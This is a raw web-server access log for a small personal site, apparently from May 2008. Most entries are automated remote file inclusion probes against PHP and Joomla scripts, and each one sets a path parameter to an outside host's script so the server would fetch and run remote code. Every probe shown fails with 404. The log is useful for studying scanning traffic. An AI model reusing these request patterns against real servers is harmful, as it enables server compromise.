82.78.216.197 - - [29/May/2008:11:20:44 -0500] "GET /send_reminders.php?includedir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.55.208.122 - - [29/May/2008:11:21:21 -0500] "GET /logs/access_log.1191369600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.30.73.117 - - [29/May/2008:11:23:56 -0500] "GET /send_reminders.php?includedir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 302 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
195.12.53.176 - - [29/May/2008:11:25:56 -0500] "GET /logs/send_reminders.php?includedir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.12.53.176 - - [29/May/2008:11:25:57 -0500] "GET /send_reminders.php?includedir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.6.18.217 - - [29/May/2008:11:35:55 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.84.106.68 - - [29/May/2008:11:35:55 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
74.6.9.125 - - [29/May/2008:11:35:55 -0500] "GET /logs/access_log.1167523200 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.84.106.68 - - [29/May/2008:11:35:56 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.84.106.68 - - [29/May/2008:11:36:33 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
70.84.106.68 - - [29/May/2008:11:36:33 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.167.156.20 - - [29/May/2008:11:40:59 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:11:40:59 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
202.179.180.41 - - [29/May/2008:11:49:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.41 - - [29/May/2008:11:49:50 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
83.65.47.4 - - [29/May/2008:11:54:51 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
83.65.47.4 - - [29/May/2008:11:54:54 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
151.11.24.250 - - [29/May/2008:11:57:58 -0500] "GET //////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 302 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
151.11.24.250 - - [29/May/2008:11:57:58 -0500] "GET /logs//////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 307 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
65.55.208.131 - - [29/May/2008:11:58:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [29/May/2008:11:58:07 -0500] "GET /logs/access_log.1179532800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.90.73.127 - - [29/May/2008:12:03:21 -0500] "GET /logs//login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.90.73.127 - - [29/May/2008:12:03:21 -0500] "GET //login.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.148.252.24 - - [29/May/2008:12:03:49 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
213.148.252.24 - - [29/May/2008:12:03:49 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
66.90.73.127 - - [29/May/2008:12:06:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
66.90.73.127 - - [29/May/2008:12:06:03 -0500] "GET //skin/zero_vote/error.php?dir=http://amsny.org/site/id1.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.64.81.28 - - [29/May/2008:12:06:13 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
69.64.81.28 - - [29/May/2008:12:06:13 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
65.55.212.47 - - [29/May/2008:12:07:01 -0500] "GET /artwork/furniture-misc.htm HTTP/1.0" 200 1977 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
165.166.22.114 - - [29/May/2008:12:07:11 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.166.22.114 - - [29/May/2008:12:07:12 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.166.22.114 - - [29/May/2008:12:07:13 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.166.22.114 - - [29/May/2008:12:07:13 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.166.22.114 - - [29/May/2008:12:07:13 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
62.2.100.138 - - [29/May/2008:12:07:14 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:12:07:14 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
216.167.156.20 - - [29/May/2008:12:08:18 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:12:08:18 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
62.2.100.138 - - [29/May/2008:12:10:56 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:12:10:56 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
65.55.212.47 - - [29/May/2008:12:10:58 -0500] "GET /artwork/icefishing_diorama.png HTTP/1.0" 200 49088 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.21.47 - - [29/May/2008:12:11:29 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [29/May/2008:12:11:29 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.18.155.74 - - [29/May/2008:12:14:20 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
72.18.155.74 - - [29/May/2008:12:14:20 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
200.223.113.2 - - [29/May/2008:12:14:43 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
201.6.121.78 - - [29/May/2008:12:16:36 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
201.6.121.78 - - [29/May/2008:12:16:39 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
92.48.65.154 - - [29/May/2008:12:19:04 -0500] "GET /logs/access_log.1207180800//ws/get_events.php?includedir=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
92.48.65.154 - - [29/May/2008:12:19:04 -0500] "GET //ws/get_events.php?includedir=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
92.48.65.154 - - [29/May/2008:12:19:04 -0500] "GET /logs//ws/get_events.php?includedir=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
65.55.212.47 - - [29/May/2008:12:20:14 -0500] "GET /artwork/big-catch-diorama.png HTTP/1.0" 200 60457 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:12:20:15 -0500] "GET /artwork/dropoff_diorama.jpg HTTP/1.0" 200 83346 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:12:20:15 -0500] "GET /artwork/llpostcards.htm HTTP/1.0" 200 1147 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:12:23:28 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.0" 200 2441 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:12:25:13 -0500] "GET /artwork/messenger-diorama.png HTTP/1.0" 200 58929 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [29/May/2008:12:27:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [29/May/2008:12:27:02 -0500] "GET /logs/access_log.1156032000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
193.34.68.43 - - [29/May/2008:12:29:34 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
193.34.68.43 - - [29/May/2008:12:29:34 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://scaneru.nm.ru/idv.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.240.250.130 - - [29/May/2008:12:34:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
213.240.250.130 - - [29/May/2008:12:34:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
200.59.145.196 - - [29/May/2008:12:36:19 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:12:36:19 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:12:36:19 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:12:37:26 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
64.13.224.83 - - [29/May/2008:12:37:36 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
64.13.224.83 - - [29/May/2008:12:37:37 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.42.110.250 - - [29/May/2008:12:37:38 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.42.110.250 - - [29/May/2008:12:37:39 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.231.171.70 - - [29/May/2008:12:38:39 -0500] "GET /logs/admin_styles.php?phpbb_root_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
80.231.171.70 - - [29/May/2008:12:38:43 -0500] "GET /admin_styles.php?phpbb_root_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
195.12.53.176 - - [29/May/2008:12:40:50 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
65.87.22.58 - - [29/May/2008:12:42:27 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.800"
75.125.252.82 - - [29/May/2008:12:47:30 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
75.125.252.82 - - [29/May/2008:12:47:30 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
80.231.171.70 - - [29/May/2008:12:50:47 -0500] "GET /logs/include.php?path[docroot]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
80.231.171.70 - - [29/May/2008:12:50:48 -0500] "GET /include.php?path[docroot]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:12:52:47 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.2.100.138 - - [29/May/2008:12:52:48 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.158.195.132 - - [29/May/2008:12:53:33 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
194.158.195.132 - - [29/May/2008:12:53:33 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
65.55.208.135 - - [29/May/2008:12:54:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [29/May/2008:12:54:10 -0500] "GET /logs/access_log.1206748800 HTTP/1.1" 200 307102 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.52.112.2 - - [29/May/2008:12:57:49 -0500] "GET /logs/access_log.1207785600//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
74.52.112.2 - - [29/May/2008:12:57:49 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
74.52.112.2 - - [29/May/2008:12:57:49 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
74.52.112.2 - - [29/May/2008:12:58:09 -0500] "GET /logs/access_log.1207008000//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
213.240.250.130 - - [29/May/2008:12:58:27 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
207.44.204.43 - - [29/May/2008:13:00:56 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
207.44.204.43 - - [29/May/2008:13:00:56 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
72.18.155.74 - - [29/May/2008:13:01:01 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
72.18.155.74 - - [29/May/2008:13:01:02 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
66.197.154.101 - - [29/May/2008:13:03:09 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
66.197.154.101 - - [29/May/2008:13:03:09 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
200.89.145.82 - - [29/May/2008:13:05:07 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
62.76.116.20 - - [29/May/2008:13:06:58 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
62.76.116.20 - - [29/May/2008:13:06:59 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
62.76.116.20 - - [29/May/2008:13:06:59 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
200.30.73.117 - - [29/May/2008:13:09:03 -0500] "GET /source/mod/rss/channeledit.php?Codebase=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
216.195.49.105 - - [29/May/2008:13:09:45 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
216.195.49.105 - - [29/May/2008:13:09:50 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
195.12.53.176 - - [29/May/2008:13:10:54 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 351 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
195.12.53.176 - - [29/May/2008:13:13:47 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.223.113.2 - - [29/May/2008:13:16:10 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
200.223.113.2 - - [29/May/2008:13:16:11 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
200.223.113.2 - - [29/May/2008:13:16:13 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
200.71.194.211 - - [29/May/2008:13:17:02 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
200.223.113.2 - - [29/May/2008:13:17:30 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
194.158.195.132 - - [29/May/2008:13:21:24 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
194.158.195.132 - - [29/May/2008:13:21:24 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
194.158.195.132 - - [29/May/2008:13:21:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
194.158.195.132 - - [29/May/2008:13:21:38 -0500] "GET /logs/access_log.1207180800//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
72.18.155.74 - - [29/May/2008:13:22:40 -0500] "GET /logs/access_log.1178668800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_weblinks&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
72.18.155.74 - - [29/May/2008:13:22:41 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_weblinks&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
72.18.155.74 - - [29/May/2008:13:22:41 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_weblinks&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
65.55.208.122 - - [29/May/2008:13:24:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [29/May/2008:13:24:15 -0500] "GET /logs/access_log.1159488000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [29/May/2008:13:24:15 -0500] "GET /logs/access_log.1175472000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
84.19.176.172 - - [29/May/2008:13:32:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:13:32:21 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
201.6.121.78 - - [29/May/2008:13:34:42 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
201.6.121.78 - - [29/May/2008:13:34:46 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
201.6.121.78 - - [29/May/2008:13:34:50 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
195.209.236.71 - - [29/May/2008:13:35:46 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:13:35:46 -0500] "GET /newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
216.70.125.187 - - [29/May/2008:13:36:12 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
